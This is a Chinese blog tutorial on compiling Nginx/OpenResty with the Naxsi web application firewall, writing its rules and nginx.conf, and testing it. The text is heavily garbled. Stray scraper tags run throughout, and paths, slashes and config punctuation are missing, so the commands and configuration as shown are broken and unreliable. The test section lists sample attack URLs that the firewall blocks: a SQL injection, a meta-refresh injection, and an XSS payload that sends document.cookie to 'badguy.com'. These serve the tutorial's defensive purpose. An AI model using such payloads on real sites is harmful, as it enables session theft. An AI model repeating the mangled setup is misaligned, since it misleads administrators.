二、下载Naxsi
@H_197_22@cd /@H_197_22@data0software wget https://github.com/nbs-system/naxsi/archive/master.zip@H_197_22@ mv master naxsi-@H_197_22@master.@H_197_22@zip unzip naxsizip
三、重新编译Nginx,加入naxsi模块
cd ngx_openresty-1.4.3.6@H_197_22@ ./@H_197_22@configure --@H_197_22@user=@H_197_22@www --groupprefix=/usr/localopenresty withluajit http_stub_status_module http_ssl_module http_sub_module http_realip_module add-@H_343_76@module/data0/@H_197_22@naxsinaxsi_src gmake gmake install cd ../
四、拷贝Naxsi的核心配置规则库
cp naxsi_confignaxsi_corerules usr/webserverNginxconf/
定义一个虚拟主机的安全规则
vi @H_49_28@mysiterules
内容如下:
#LearningMode; #Enables learning mode@H_197_22@ SecrulesEnabled;@H_197_22@ #SecrulesDisabled;DeniedUrl@H_197_22@ "/requestDenied"## check rulescheckRule@H_197_22@"$sql >= 8"@H_197_22@ BLOCK"$RFI >= 8"@H_197_22@"$TRAVERSAL >= 4"@H_197_22@"$EVADE >= 4"@H_197_22@"$XSS >= 8"@H_197_22@;
编辑Nginx.conf
conf
在http部分加入如下配置
include rules;
完整的Nginx.conf如下
user www www worker_processes 8 error_log data1logsNginx_errorlog crit pid pid #Specifies the value for maximum file descriptors that can be opened by this process.@H_197_22@ worker_rlimit_nofile 65535 events {@H_197_22@ use@H_197_22@ epoll worker_connections }@H_197_22@ http include mimetypes include default_type applicationoctetstream #charset gb2312;@H_197_22@ server_names_hash_bucket_size 128 client_header_buffer_size 32k large_client_header_buffers 4@H_197_22@ client_max_body_size 8m sendfile on tcp_nopush on keepalive_timeout 60 tcp_nodelay on server_tokens off fastcgi_connect_timeout 300 fastcgi_send_timeout fastcgi_read_timeout fastcgi_buffer_size 64k fastcgi_buffers fastcgi_busy_buffers_size 128k fastcgi_temp_file_write_size gzip on gzip_min_length 1k gzip_buffers 16k gzip_http_version 1.0 gzip_comp_level 2 gzip_types textplain applicationxjavascript textcss applicationxml gzip_vary on#limit_zone crawler $binary_remote_addr 10m;@H_197_22@ log_format access '$remote_addr - $remote_user [$time_local] "$request" '@H_197_22@ '$status $body_bytes_sent $upstream_response_time $request_time "$http_referer" '@H_197_22@'"$http_user_agent" $http_x_forWARDed_for "$server_name" "$http_host"' log_format wwwlogs server listen 80 server_name blogabccom index indexhtml indexhtm indexPHP root htdocsblog #limit_conn crawler 20; @H_197_22@ LOCATIOn ~@H_197_22@ .*@H_197_22@\.(@H_197_22@|@H_197_22@PHP5)?@H_197_22@$ #fastcgi_pass unix:/tmp/php-cgi.sock;@H_197_22@ fastcgi_pass 127.00.1:9000 fastcgi_index index include fcgi LOCATIOn gifjpgjpegpngbmpswf)@H_197_22@ expires 30d LOCATIOn jscss1h access_log accesslog access server server_name wwwwww include proxy_pass http//127.0.0.1/;@H_197_22@ proxy_set_header Host@H_197_22@ www /requestDenied@H_197_22@ return403 access_log log wwwlogs error_log @H_49_28@mysite_Nginx_errorlog debug access_log wwwlogs listen server_name status stub_status on access_log off}
五、启动Nginx
killall 9@H_197_22@ Nginx sbinNginx
六、测试
http//www.abc.com/test.PHP?name=40/**/and/**/1=1 不通过,含有条件注入@H_197_22@ http//www.abc.com/test.PHP?name=%28%29 不通过,特殊字符@H_197_22@//www.abc.com/test.PHP?term=%3Cscript%3Ewindow.open%28%22http://badguy.com?cookie=%22+document.cookie%29%3C/script%3E 不通过,参数内容含脚本注入@H_197_22@//www.abc.com/test.PHP?title=Meta%20http-equiv=%22refresh%22%20content=%220;%22 不通过
可以到/data1/logs/mysite_Nginx_error.log查看naxsi过滤的请求
除非注明,本博客文章均为原创,转载请以链接形式标明本文地址 本文地址: http://blog.cnwyhx.com/?p=301